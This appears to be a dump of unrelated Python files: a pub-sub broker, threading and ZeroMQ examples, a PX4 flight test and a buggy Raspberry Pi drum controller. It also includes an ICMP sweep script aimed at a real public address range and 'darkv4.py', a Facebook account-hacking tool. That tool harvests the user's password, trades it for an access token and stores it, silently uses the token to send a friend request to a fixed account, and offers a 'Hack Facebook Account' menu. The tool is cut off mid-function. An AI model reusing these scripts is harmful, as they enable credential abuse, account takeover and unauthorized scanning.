str(nr_start), str(nr_end)))
(cr_start, cr_end) = self.replica_segment
curr_range = segment_range(cr_start, cp_end) # use the whole range Replica + Primary
new_range = segment_range(nr_start, np_end) # Same here
if new_range > curr_range: # gained responsibility
if (cr_start == -1): delta_end = nr_end
elif (cr_start == 0): delta_end = MAX_HASH - 1
else: delta_end = cr_start - 1
view_change = ControlEvent(EventType.UPDATE_TOPICS, {SEGMENT: (nr_start, delta_end)})
self.event_queue.put(view_change)
# No need to do anything if range is smaller or the same
# Replace local cached copy with new ring
self.brokers = updated_ring
self.primary_segment = (np_start, np_end)
self.replica_segment = (nr_start, nr_end)
return
# Given a topic map of topics that need updating, reach out to
def prepare_as_primary(self, topics):
# Find Current Primary of the segment that you'll use to get up to date
curr_primary, _ = find_chord_successor(self.my_address, self.brokers)
rpc_primary = buildBrokerClient(curr_primary.key)
# Loop Through topics and update local topic queues
for name, global_next_index in topics.items():
self.update_topic(name, global_next_index, rpc_primary)
print("Updating topic: {} until {}".format(name, str(global_next_index)))
def update_topic(self, topic_name: str, goal_index: int, rpc_broker):
# Create Topic if it doesn't already exist
if not self.topics.get(topic_name, None):
self.creation_lock.acquire()
if not self.topics.get(topic_name, None):
self.topics[topic_name] = Topic(topic_name)
self.creation_lock.release()
# Get Next Index that this broker needs locally
my_next_index = self.topics[topic_name].next_index()
# Consume data from other broker until you've reached global next index
while goal_index > my_next_index:
partial_log = rpc_broker.broker.consume(topic_name, my_next_index)
for message in partial_log:
self.topics[topic_name].publish(message)
my_next_index = self.topics[topic_name].next_index()
def perform_view_change_sync(self, segment, successor):
if self.my_address != successor.key:
logging.warning("Broker {} is performing view change with {} for segment[{}, {}]".format(
self.my_address, successor.key, str(segment[0]), str(segment[1])))
return
def perform_replica_sync(self, segment, predecessor):
if segment[0] != -1 and segment[1] != -1:
logging.warning("Broker {} is updating replicas with {} for segment[{}, {}]".format(
self.my_address, predecessor.key, str(segment[0]), str(segment[1])))
# create rpc client
client = buildBrokerClient(predecessor.key)
# get the data
data = client.broker.consume_bulk_data(segment[0], segment[1])
# set local state - create Topic objects and add them to our dict
self.creation_lock.acquire()
for topic in data:
t_obj = Topic(topic)
t_obj.messages = data[topic]
self.topics[topic] = t_obj
#print("======\n{}\n{}\n======".format(type(self.topics[topic]), self.topics[topic]))
self.creation_lock.release()
def registry_callback(self, watch_event):
# build updated chord ring
broker_addrs = self.zk_client.get_children(BROKER_REG_PATH)
updated_ring = create_chord_ring(broker_addrs)
# send event back to Broker controller
data = {CHORD_RING: updated_ring}
event = ControlEvent(EventType.RING_UPDATE, data)
self.event_queue.put(event)
return
def state_change_handler(self, conn_state):
if conn_state == KazooState.LOST:
logging.warning("Kazoo Client detected a Lost state")
self.event_queue.put(ControlEvent(EventType.RESTART_BROKER))
elif conn_state == KazooState.SUSPENDED:
logging.warning("Kazoo Client detected a Suspended state")
self.event_queue.put(ControlEvent(EventType.PAUSE_OPER))
elif conn_state == KazooState.CONNECTED: # KazooState.CONNECTED
logging.warning("Kazoo Client detected a Connected state")
self.event_queue.put(ControlEvent(EventType.RESUME_OPER))
else:
logging.warning("Kazoo Client detected an UNKNOWN state")
def primary_topics(self):
"""Returns the list of topics this node is a primary for
"""
pt = []
for t_name in self.topics:
t_hash = chord_hash(t_name)
if in_segment_range(t_hash, self.primary_segment[0], self.primary_segment[1]):
pt.append(t_name)
return pt
def replica_topics(self):
"""Returns the list of topics this node is a replica for
"""
pt = []
for t_name in self.topics:
t_hash = chord_hash(t_name)
if in_segment_range(t_hash, self.replica_segment[0], self.replica_segment[1]):
pt.append(t_name)
return pt
return data
def cli(self):
while True:
try:
ipt = input("\n> ")
tokens = ipt.split(" ")
cmd = tokens[0]
arg = None
if len(tokens) > 1:
arg = tokens[1]
if cmd == "pseg":
print(self.primary_segment)
elif cmd == "rseg":
print(self.replica_segment)
elif cmd == "ptop":
print(self.primary_topics())
elif cmd == "rtop":
print(self.replica_topics())
elif cmd == "topics":
val = list(self.topics.keys())
val.sort()
print(val)
elif cmd == "view":
print(self.curr_view)
elif cmd == "brokers":
print(self.brokers) # this doesn't pretty print?
elif cmd == "topic": # a specific topic
if arg:
print(self.topics[arg].messages[-10:])
else: # all the topic values
for topic in self.topics:
print("{} : {}".format(topic, self.topics[topic].messages[-10:]))
elif cmd != "": #help
hint = "Available commands\n" + \
"'pseg' -> primary segment\n" + \
"'rseg' -> replica segment\n" + \
"'ptop' -> primary topic\n" + \
"'rtop' -> replica topic\n" + \
"'topics' -> list of topics\n" + \
"'topic x' -> last 10 messages in topic 'x'\n" + \
"'view' -> current view number\n" + \
"'brokers' -> list of all brokers"
print(hint)
except Exception as e:
print("Error:", e)
# TODO cli
# - brokers in order of chord ring. Format to help viz-
# node-1 (x, y)
# node-2 (y+1, z)
# node-3 (z+1, x-1)
# Also if the terminal is getting too messy,
# redirect log output of all processes to a file and do "tail -f"
def start_broker(zk_hosts, chord_url, server_url):
ip_addr = server_url.split(":")[0]
port = int(server_url.split(":")[1])
# Create the Broker and Spin up its RPC server
rpc_server = threadedXMLRPCServer((ip_addr, port), requestHandler=RequestHandler)
broker = PubSubBroker(chord_url, zk_hosts)
# Register all functions in the Broker's Public API
rpc_server.register_introspection_functions()
rpc_server.register_function(broker.enqueue, "broker.enqueue")
rpc_server.register_function(broker.enqueue_replica, "broker.enqueue_replica")
rpc_server.register_function(broker.last_index, "broker.last_index")
rpc_server.register_function(broker.consume, "broker.consume")
rpc_server.register_function(broker.consume_bulk_data, "broker.consume_bulk_data")
rpc_server.register_function(broker.request_view_change, "broker.request_view_change")
# Hidden RPCs to support REPL debugging
rpc_server.register_function(broker.get_queue, "broker.get_queue")
rpc_server.register_function(broker.get_topics, "broker.get_topics")
# Control Broker management
service_thread = threading.Thread(target=broker.serve)
service_thread.start()
# CLI for debugging - will be messy due to log outputs
cli_thread = threading.Thread(target=broker.cli)
cli_thread.start()
# Start Broker RPC Server
rpc_server.serve_forever()
service_thread.join()
cli_thread.join()
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Usage: python src/pubsubBroker.py <broker_addr> <zk_host1> <zk_host2>...")
exit(1)
print("Starting PubSub Broker...")
broker_address = sys.argv[1]
zk_hosts = sys.argv[2:]
if 'localhost' in broker_address:
public_address = broker_address
print("Using provided localhost address: {}".format(broker_address))
elif '0.0.0.0' in broker_address:
public_ip = get('https://api.ipify.org').text
port = broker_address.split(':')[1]
public_address = public_ip + ':' + port
print("Finding public address to use for clients: {}".format(broker_address))
else:
public_address = broker_address
print("Boy! I don't know what you're doing with that address, {}. I sure hope it's right!".format(broker_address))
# Display the loaded configuration
start_broker(zk_hosts, public_address, broker_address)
|
sema_signal.py
|
# sema_signal.py
#
# An example of using a semaphore to signal
import threading
import time
done = threading.Semaphore(0)
item = None
def producer():
global item
print "I'm the producer and I produce data."
print "Producer is going to sleep."
time.sleep(10)
item = "Hello"
print "Producer is alive. Signaling the consumer."
done.release()
def consumer():
print "I'm a consumer and I wait for data."
print "Consumer is waiting."
done.acquire()
print "Consumer got", item
t1 = threading.Thread(target=producer)
t2 = threading.Thread(target=consumer)
t1.start()
t2.start()
|
icmp_fast_scan.py
|
#####################################
# Python para Pentesters #
# https://solyd.com.br/treinamentos #
#####################################
import random
import socket
import time
import ipaddress
import struct
from threading import Thread
def checksum(source_string):
sum = 0
count_to = (len(source_string) / 2) * 2
count = 0
while count < count_to:
this_val = ord(source_string[count + 1]) * 256 + ord(source_string[count])
sum = sum + this_val
sum = sum & 0xffffffff
count = count + 2
if count_to < len(source_string):
sum = sum + ord(source_string[len(source_string) - 1])
sum = sum & 0xffffffff
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
answer = ~sum
answer = answer & 0xffff
answer = answer >> 8 | (answer << 8 & 0xff00)
return answer
def create_packet(id):
header = struct.pack('bbHHh', 8, 0, 0, id, 1)
data = 192 * 'Q'
my_checksum = checksum(header + data)
header = struct.pack('bbHHh', 8, 0, socket.htons(my_checksum), id, 1)
return header + data
def ping(addr, timeout=1):
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except Exception as e:
print e
packet_id = int((id(timeout) * random.random()) % 65535)
packet = create_packet(packet_id)
my_socket.connect((addr, 80))
my_socket.sendall(packet)
my_socket.close()
def rotate(addr, file_name, wait, responses):
print "Sending Packets", time.strftime("%X %x %Z")
for ip in addr:
ping(str(ip))
time.sleep(wait)
print "All packets sent", time.strftime("%X %x %Z")
print "Waiting for all responses"
time.sleep(2)
# Stoping listen
global SIGNAL
SIGNAL = False
ping('127.0.0.1') # Final ping to trigger the false signal in listen
print len(responses), "hosts found!"
print "Writing File"
hosts = []
for response in sorted(responses):
ip = struct.unpack('BBBB', response)
ip = str(ip[0]) + "." + str(ip[1]) + "." + str(ip[2]) + "." + str(ip[3])
hosts.append(ip)
file = open(file_name, 'w')
file.write(str(hosts))
print "Done", time.strftime("%X %x %Z")
def listen(responses):
global SIGNAL
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind(('', 1))
print "Listening"
while SIGNAL:
packet = s.recv(1024)[:20][-8:-4]
responses.append(packet)
print "Stop Listening"
s.close()
SIGNAL = True
responses = []
ips = '200.131.0.0/20' # Internet network
wait = 0.002 # Adjust this based in your bandwidth (Faster link is Lower wait)
file_name = 'log1.txt'
ip_network = ipaddress.ip_network(unicode(ips), strict=False)
t_server = Thread(target=listen, args=[responses])
t_server.start()
t_ping = Thread(target=rotate, args=[ip_network, file_name, wait, responses])
t_ping.start()
|
MasterConroller.py
|
import RPi.GPIO as GPIO
import os
import threading
import time
from DrumpadService import DrumpadService
from LoopService import LoopService
from DisplayLCD import DisplayLCD
class MasterController:
def __init__(self):
self.drumpadService = DrumpadService()
self.loopService = LoopService()
self.displayLCD = DisplayLCD()
# list containing strings of drums available
self.drumList = None
# what seat is currently selected in drumlist
self.drumListIndex = 0
# list containing strings of songs available
self.songList = None
# what seat is currently selected in songlist
self.songListIndex = 0
# list containing strings of menu options available
self.menuList = None
# what seat is currently selected in menulist
self.menuListIndex = 0
# 0 = menulist, 1 = drumList, 2 = songList
self.listPicked = 0
self.DRUMPATH = "../Sounds/Drums"
self.SONGPATH = "../Sounds/Songs"
self.initializeDrumList(self.DRUMPATH)
self.initializeSongList(self.SONGPATH)
self.initializeMenuList()
self.displayLCD.displayList("Menu", self.menuList, self.menuListIndex)
#VELJA NÚMER Á TÖKKUM
self.BACK_BUTTON = 12
self.SELECT_BUTTON = 16
self.UP_BUTTON = 20
self.DOWN_BUTTON = 21
self.initializeScreenButtons()
def initializeDrumList(self, path):
self.drumList = os.listdir(path)
def initializeSongList(self, path):
self.songList = os.listdir(path)
def initializeMenuList(self):
self.menuList = ["Choose Drums", "Choose Song", "New Song"]
def initializeScreenButtons(self):
print("Initializing Interups for screen buttons")
GPIO.setup(self.BACK_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.SELECT_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.UP_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.DOWN_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(self.BACK_BUTTON, GPIO.RISING, callback=lambda x: self.back(), bouncetime=300)
GPIO.add_event_detect(self.SELECT_BUTTON, GPIO.RISING, callback=lambda x: self.select(), bouncetime=300)
GPIO.add_event_detect(self.UP_BUTTON, GPIO.RISING, callback=lambda x: self.up(), bouncetime=300)
GPIO.add_event_detect(self.DOWN_BUTTON, GPIO.RISING, callback=lambda x: self.down(), bouncetime=300)
#TODO
def up(self):
if(self.listPicked == 0):
self.menuListIndex = (self.menuListIndex -1)%len(self.menuList)
# display updated menu list on screen
self.displayLCD.up("Menu", self.menuList, self.menuListIndex)
elif(self.listPicked == 1):
self.drumListIndex = (self.drumListIndex -1)%len(self.drumList)
# display updated drum list on screen
self.displayLCD.up("Drums", self.drumList, self.drumListIndex)
elif(seef.listPicked == 2):
self.songListIndex = (self.songListIndex -1)%len(self.songList)
# display updated song list on screen
self.displayLCD.up("Songs", self.songList, self.songListIndex)
#TODO
def down(self):
if(self.listPicked == 0):
self.menuListIndex = (self.menuListIndex +1)%len(self.menuList)
# display updated menu list on screen
self.displayLCD.down("Menu", self.menuList, self.menuListIndex)
elif(self.listPicked == 1):
self.drumListIndex = (self.drumListIndex +1)%len(self.drumList)
# display updated drum list on screen
self.displayLCD.down("Drums", self.drumList, self.drumListIndex)
elif(seef.listPicked == 2):
self.songListIndex = (self.songListIndex +1)%len(self.songList)
# display updated song list on screen
self.displayLCD.down("Songs", self.songList, self.songListIndex)
#TODO
def select(self):
if(self.listPicked == 0):
pass
if(self.menuListIndex == 0):
self.listPicked += 1
# Switch list on drum display
self.displayLCD.displayList("Drums", self.drumList, self.drumListIndex)
elif(self.menuListIndex == 1):
self.listPicked += 2
# Switch list on song display
self.displayLCD.displayList("Songs", self.songList, self.songListIndex)
elif(self.menuListIndex == 2):
# Reset loop player
self.resetLoopService()
# display screen that new song is read
self.displayLCD.showSuccess("Starting NewSong")
# display menuList again after some time
self.displayLCD.displayList("Menu", self.menuList, self.menuListIndex)
elif(self.listPicked == 1):
self.drumpadService.changeDrums(self.drumListIndex)
# Display "drums X picked"
self.displayLCD.showSuccess("Drums_"+str(self.drumListIndex)+" Selected")
elif(slef.listPicked == 2):
# Display "no sounds available at this moment"
pass
#TODO
def back(self):
if(self.listPicked == 0):
pass
elif(self.listPicked == 1 or self.listPicked == 2):
self.listPicked = 0
# display menuList
self.displayLCD.displayList("Menu", self.menuList, self.menuListIndex)
#TODO
def resetLoopService(self):
self.loopService = None
self.loopService = LoopService()
pass
#TODO
def runDrumService(self):
t1 = threading.Thread(target=self.drumpadService.mainDrum())
t1.start()
#TODO
def runLoopService(self):
t1 = threading.Thread(target=self.loopService.main())
t1.start()
pass
def main():
controller = MasterController()
controller.runDrumService()
if __name__ == '__main__':main()
|
mavros_offboard_posctl_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2015 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Andreas Antener <andreas@uaventure.com>
#
# The shebang of this file is currently Python2 because some
# dependencies such as pymavlink don't play well with Python3 yet.
from __future__ import division
PKG = 'px4'
import rospy
import math
import numpy as np
from geometry_msgs.msg import PoseStamped, Quaternion
from mavros_msgs.msg import ExtendedState
from mavros_test_common import MavrosTestCommon
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardPosctlTest(MavrosTestCommon):
"""
Tests flying a path in offboard control by sending position setpoints
via MAVROS.
For the test to be successful it needs to reach all setpoints in a certain time.
FIXME: add flight path assertion (needs transformation from ROS frame to NED)
"""
def setUp(self):
super(MavrosOffboardPosctlTest, self).setUp()
self.pos = PoseStamped()
self.radius = 1
self.pos_setpoint_pub = rospy.Publisher(
'mavros/setpoint_position/local', PoseStamped, queue_size=1)
# send setpoints in seperate thread to better prevent failsafe
self.pos_thread = Thread(target=self.send_pos, args=())
self.pos_thread.daemon = True
self.pos_thread.start()
def tearDown(self):
pass
#
# Helper methods
#
def send_pos(self):
rate = rospy.Rate(10) # Hz
self.pos.header = Header()
self.pos.header.frame_id = "base_footprint"
while not rospy.is_shutdown():
self.pos.header.stamp = rospy.Time.now()
self.pos_setpoint_pub.publish(self.pos)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
def is_at_position(self, x, y, z, offset):
"""offset: meters"""
rospy.logdebug(
"current position | x:{0:.2f}, y:{1:.2f}, z:{2:.2f}".format(
self.local_position.pose.position.x, self.local_position.pose.
position.y, self.local_position.pose.position.z))
desired = np.array((x, y, z))
pos = np.array((self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
return np.linalg.norm(desired - pos) < offset
def reach_position(self, x, y, z, timeout):
"""timeout(int): seconds"""
# set a position setpoint
self.pos.pose.position.x = x
self.pos.pose.position.y = y
self.pos.pose.position.z = z
rospy.loginfo(
"attempting to reach position | x: {0}, y: {1}, z: {2} | current position x: {3:.2f}, y: {4:.2f}, z: {5:.2f}".
format(x, y, z, self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
# For demo purposes we will lock yaw/heading to north.
yaw_degrees = 0 # North
yaw = math.radians(yaw_degrees)
quaternion = quaternion_from_euler(0, 0, yaw)
self.pos.pose.orientation = Quaternion(*quaternion)
# does it reach the position in 'timeout' seconds?
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
reached = False
for i in xrange(timeout * loop_freq):
if self.is_at_position(self.pos.pose.position.x,
self.pos.pose.position.y,
self.pos.pose.position.z, self.radius):
rospy.loginfo("position reached | seconds: {0} of {1}".format(
i / loop_freq, timeout))
reached = True
break
rate.sleep()
self.assertTrue(reached, (
"took too long to get to position | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
#
# Test method
#
def test_posctl(self):
"""Test offboard position control"""
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
self.wait_on_landed_state(ExtendedState.LANDED_STATE_ON_GROUND, 10, -1)
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
positions = ((0, 0, 0), (2, 2, 2), (2, -2, 2), (-2, -2, 2), (2, 2, 2))
for i in xrange(len(positions)):
self.reach_position(positions[i][0], positions[i][1],
positions[i][2], 18)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_posctl_test',
MavrosOffboardPosctlTest)
|
mq.py
|
import json
import time
from dataclasses import dataclass, asdict
from json import JSONDecodeError
from threading import Thread
import zmq
import logging
from ..consts import RUNNING, INIT, STOPPED
from ..dtypes import Message
from queue import Queue, Empty
from zolo.consts import USER_MSG_GATEWAY
log = logging.getLogger(__name__)
#
# INIT = "INIT"
# RUNNING = "RUNNING"
# STOPPED = "STOPPED"
#
#
# @dataclass(frozen=True)
# class Message:
# cmd: str
# payload: dict
class ZmqGateway:
def __init__(self, host: str):
self._state = INIT
self._thread: Thread = None
self._ctx = zmq.Context()
self._sock = self._ctx.socket(zmq.PAIR)
self._poller = zmq.Poller()
self._poller.register(self._sock, zmq.POLLIN)
self._sock.bind(f"{host}")
super().__init__()
@property
def is_running(self):
return self._state == RUNNING
def _poll(self, q: Queue):
self._state = RUNNING
while self.is_running:
try:
msg = self._poll_once()
except TimeoutError:
continue
q.put(msg)
self._state = STOPPED
def _poll_once(self):
res = self._poller.poll(timeout=1)
if not res:
raise TimeoutError
msg: bytes = self._sock.recv()
if msg:
try:
msg = json.loads(msg, encoding="utf8")
return Message(cmd=msg["cmd"], payload=msg["payload"])
except (KeyError, JSONDecodeError):
log.warning(f"invalid msg: {msg}")
return
raise TimeoutError
def reboot(self, q: Queue):
self.stop()
self.start(q)
def stop(self):
if self.is_running:
self._state = STOPPED
self._thread.join(5)
self._poller.unregister(self._sock)
if self._state != STOPPED:
log.error("Try to stop failed!")
def start(self, q: Queue):
if not self.is_running:
self._thread = Thread(target=self._poll, args=(q,))
self._thread.start()
def main():
context = zmq.Context()
q = Queue()
gw = ZmqGateway("tcp://*:5555")
gw.start(q)
client = context.socket(zmq.PAIR)
client.connect(USER_MSG_GATEWAY)
while True:
try:
msg = q.get(timeout=3)
except Empty:
res = json.dumps(
asdict(Message(
"START",
dict(timeout=5)
))
).encode("utf8")
client.send(res)
except KeyboardInterrupt:
gw.stop()
break
else:
print(msg)
if __name__ == '__main__':
main()
|
darkv4.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m MR FARID86 \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/DARKFARID\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/farid.nick1\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
